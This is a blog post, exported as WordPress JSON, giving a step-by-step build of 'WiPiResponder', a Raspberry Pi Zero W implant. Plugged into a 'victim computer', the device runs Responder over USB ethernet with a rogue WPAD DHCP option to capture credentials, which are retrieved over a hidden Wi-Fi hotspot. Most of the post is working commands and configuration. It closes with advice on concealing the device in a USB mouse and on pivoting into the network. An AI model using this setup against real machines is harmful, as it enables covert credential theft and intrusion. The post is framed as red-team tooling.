{"id":1353,"date":"2017-03-08T23:07:11","date_gmt":"2017-03-08T23:07:11","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=1353"},"modified":"2017-03-09T01:14:34","modified_gmt":"2017-03-09T01:14:34","slug":"wipiresponder-pi-zero-w-responder","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2017\/03\/08\/wipiresponder-pi-zero-w-responder\/","title":{"rendered":"WiPiResponder = Pi Zero W + Responder"},"content":{"rendered":"

\"\"<\/a><\/p>\n

So there is the Hak5<\/a> LanTutle<\/a> which is a great bit of kit. However I feel it is severely limited by the lack of onboard WiFi. The same for Mubix<\/a>‘s post ‘Snagging Creds from locked machines…<\/a>‘<\/p>\n

First off, buy yourself an PiZeroW. You’ll also need a MicroSD card and something to read\/write it.<\/p>\n

Download latest image of raspbian lite<\/a> and copy it to the MicroSD<\/p>\n

1
<\/div><\/td>
sudo<\/span> dd<\/span> bs<\/span>=1m if<\/span>=2017<\/span>-03-02-raspbian-jessie-lite.img of<\/span>=\/<\/span>dev\/<\/span>rdisk2<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Allow communication over usb cable.<\/h1>\n

The Raspberry Pi Zero W can emulate a client USB device (in this instance we will set it up as a usb ethernet adapter). We’ll need to modify boot parameters add dtoverlay=dwc2<\/em> to last line in config.txt and in cmdline.txt after rootwait (the last word on the first line) add a space and then modules-load=dwc2,g_ether<\/em> (delete everything after this)
\nAdd a blank file under \/boot called SSH. touch \/Volumes\/boot\/ssh<\/em>, this will allow us to SSH to the device as the latest version of raspbian disables this by default.<\/p>\n

Boot the device, SSH in, permit root login, change the password and then smash the pi user:<\/p>\n

1
2
3
4
5
6
7
8
9
10
<\/div><\/td>
ssh<\/span> pi@<\/span>raspberrypi.local
\nsudo<\/span> -s<\/span>
\npassed
\nuserdel -r<\/span> pi
\n#modify \/etc\/ssh\/sshd_config PermitRootLogin to be <em>PermitRootLogin yes<\/em><\/span>
\n\/<\/span>etc\/<\/span>init.d\/<\/span>ssh<\/span> restart
\nexit<\/span>
\nssh<\/span> root@<\/span>raspberrypi.local
\nuserdel -r<\/span> pi
\necho<\/span> "WiPiResponder"<\/span> ><\/span> \/<\/span>etc\/<\/span>hostname<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now we have a base build that will allow you to interact with it via USB ethernet and SSH it’s worth taking a back up so you can easily role back at any point.<\/p>\n

Internet\/Packages….<\/h1>\n

The next thing we need to do is get some packages on it, to do this we need to get the Pi Zero W on the internet. We’ll share our host devices internet to it, and as I’m on a MacBook this is pretty easy! Simply go to Sharing within System Preferences:
\n\"\"<\/a><\/p>\n

In my case the pi got a DHCP IP address which also provided a default gateway, if your setup differs you might need to enable IP forwarding on your host as well as setting a default route.<\/p>\n

Once you connect back to your Pi it’s worth updating it, check it’s got an internet connection and then run apt-get:<\/p>\n

1
2
3
<\/div><\/td>
ping<\/span> -c1<\/span> 8.8.8.8
\napt-get update<\/span>
\napt-get<\/span> -y<\/span> upgrade<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Install responder<\/h1>\n

In order to get responder going we need a few packages, as we have a working internet connection now well do it now.<\/p>\n

1
2
3
<\/div><\/td>
apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
\npip install pycrypto
\ngit clone https:\/\/github.com\/spiderlabs\/responder<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

We’ll finish off sorting out auto launching responder later.<\/p>\n

Wireless HotSpot<\/h1>\n

So that you can remotely access the pi the next thing we need to do is configure the wireless card into AP mode using hostapd and dnsmasq.<\/p>\n

1
<\/div><\/td>
apt-get install<\/span> dnsmasq hostapd<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now edit \/etc\/dhcpcd.conf and add the following line to the bottom of the file:<\/p>\n

1
<\/div><\/td>
denyinterfaces wlan0<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now we need to configure our static IP. To do this open up the interface configuration file \/etc\/network\/interfaces<\/em> and edit the wlan0 section so that it looks like this:<\/p>\n

1
2
3
4
5
6
7
<\/div><\/td>
allow-hotplug wlan0  
\niface wlan0 inet static  
\n    address 10.10.10.1
\n    netmask 255.255.255.0
\n    network 10.10.10.0
\n    broadcast 10.10.10.255
\n#    wpa-conf \/etc\/wpa_supplicant\/wpa_supplicant.conf<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And then restart dhcpcd service:<\/p>\n

1
<\/div><\/td>
service dhcpcd restart<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Next we need to configure hostapd by creating a file at \/etc\/hostapd\/hostapd.conf with the following contents, feel free to change bits as you see fit:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<\/div><\/td>
interface<\/span>=wlan0
\ndriver<\/span>=nl80211
\nssid<\/span>=WiPiResponder
\nhw_mode<\/span>=g
\nchannel<\/span>=6<\/span>
\nieee80211n<\/span>=1<\/span>
\nwmm_enabled<\/span>=1<\/span>
\nht_capab<\/span>=[<\/span>HT40]<\/span>[<\/span>SHORT-GI-20<\/span>]<\/span>[<\/span>DSSS_CCK-40<\/span>]<\/span>
\nmacaddr_acl<\/span>=0<\/span>
\nauth_algs<\/span>=1<\/span>
\nignore_broadcast_ssid<\/span>=0<\/span>
\nwpa<\/span>=2<\/span>
\nwpa_key_mgmt<\/span>=WPA-PSK
\nwpa_passphrase<\/span>=WiPiResponder
\nrsn_pairwise<\/span>=CCMP<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

We also need to tell hostapd where to look for the config file when it starts up on boot. Open up the default configuration file \/etc\/default\/hostapd and find the line #DAEMON_CONF=”” and replace it with DAEMON_CONF=”\/etc\/hostapd\/hostapd.conf”.<\/p>\n

Now we need to configure the DHCP service for the AP by editing the file \/etc\/dnsmasq.conf to contain the following:<\/p>\n

1
2
3
4
5
6
7
8
9
<\/div><\/td>
interface<\/span>=wlan0
\nlisten-address=10.10.10.1
\nbind-interfaces
\nserver<\/span>=8.8.8.8  
\ndomain-needed
\ndhcp-range=interface:wlan0,10.10.10.100,10.10.10.200,12h
\ndhcp-option=wlan0,3<\/span>,10.10.10.1
\nlog-queries
\nlog-dhcp<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And finally enabling IP forwarding before restarting the services:<\/p>\n

1
2
3
<\/div><\/td>
echo<\/span> 1<\/span> ><\/span> \/<\/span>proc\/<\/span>sys\/<\/span>net\/<\/span>ipv4\/<\/span>ip_forward
\nservice hostapd restart
\nservice dnsmasq restart<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

So now we have a working hotspot running on the pi, a quick shutdown -r now<\/em> should reboot the device and allow you to connect.<\/p>\n

Setting up DHCP on USB0<\/h1>\n

What we now need to do is configure the Pi to provide a DHCP service on usb0, we already have dnsmasq installed so we’ll simply use the same service and just configure it for usb0.
\nWe first of all need to update \/etc\/network\/interfaces to contain the following for usb0:<\/p>\n

1
2
3
4
5
6
<\/div><\/td>
allow-hotplug usb0  
\niface usb0 inet static  
\n    address 10.10.20.1
\n    netmask 255.255.255.0
\n    network 10.10.20.0
\n    broadcast 10.10.20.255<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now you need to update \/etc\/dnsmasq config to include the following (see the additional lines containing usb0):<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<\/div><\/td>
interface<\/span>=wlan0
\ninterface<\/span>=usb0
\nlisten-address=10.10.10.1
\nlisten-address=10.10.20.1
\nbind-interfaces
\nserver<\/span>=8.8.8.8  
\ndomain-needed
\ndhcp-authoritative
\ndhcp-range=interface:wlan0,10.10.10.100,10.10.10.200,12h
\ndhcp-range=interface:usb0,10.10.20.100,10.10.20.200,12h
\ndhcp-option=wlan0,3<\/span>,10.10.10.1
\ndhcp-option=usb0,3<\/span>,10.10.20.1
\ndhcp-option=usb0,252<\/span>,http:\/\/<\/span>10.10.20.1\/<\/span>wpad.dat
\nlog-queries
\nlog-dhcp
\nport<\/span>=0<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Don’t forget to disable internet sharing on your MacBook so that it uses DHCP on the usb ethernet device.<\/p>\n

Network Diagram<\/h1>\n

So we know how this all works it’s important to see how this is laid out. (God I love draw.io<\/a>!)
\n\"\"<\/a><\/p>\n

The home straight<\/h1>\n

So now we’ve got everything installed and set up the final thing to do is configure the attack vector. We need to create a service that starts on boot and runs responder. Add the following line to \/etc\/rc.local<\/em> before the exit 0<\/em> line:<\/p>\n

1
<\/div><\/td>
\/<\/span>usr\/<\/span>bin\/<\/span>screen<\/span> -dmS<\/span> responder bash<\/span> -c<\/span> 'cd \/root\/responder\/; python Responder.py -I usb0 -f -w -r -d -F'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now responder will run in a screen session, to see how it’s going or interact with it type:<\/p>\n

1
<\/div><\/td>
screen<\/span> -r<\/span> responder<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

To exit(detach) screen and leave responder running simply press “Ctrl-a then d”<\/p>\n

Now you’re good to go. Simply attach the Pi to the victim computer, walk away, connect back via wireless, SSH in and check the responder.db and log file for creds:<\/p>\n

1
<\/div><\/td>
sqlite3 \/<\/span>root\/<\/span>responder\/<\/span>Responder.db 'select * from responder'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Closing thoughts<\/h1>\n

Should you wish to make this more of a Red Team attack vector there are a few things you could do to optimise the solution. The first thing would be to hide this inside a USB mouse along with a usb hub. This would then be almost indistinguishable other than the additional network card. It would also be worth disabling SSID broadcasting my adding the following line to \/etc\/hostapd\/hostapd.conf:<\/p>\n

1
<\/div><\/td>
ignore_broadcast_ssid<\/span>=1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

It’s also worth mentioning that you could now use the wifi hotspot and the compromised machine as a pivot point into the network from outside.<\/p>\n

Creds to other blog posts who helped me with this are AdaFruit<\/a>, Frillip<\/a> and Th3 S3cr3t Ag3nt<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

So there is the Hak5 LanTutle which is a great bit of kit. However I feel it is severely limited by the lack of onboard WiFi. The same for Mubix‘s post ‘Snagging Creds from locked machines…‘ First off, buy yourself an PiZeroW. You’ll also need a MicroSD card and something to read\/write it. Download latest […]<\/p>\n","protected":false},"author":1,"featured_media":1356,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[468,469,463,97,464,465,350,351,466,409,25,467],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=1353"}],"version-history":[{"count":19,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353\/revisions"}],"predecessor-version":[{"id":1375,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353\/revisions\/1375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/1356"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=1353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=1353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=1353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}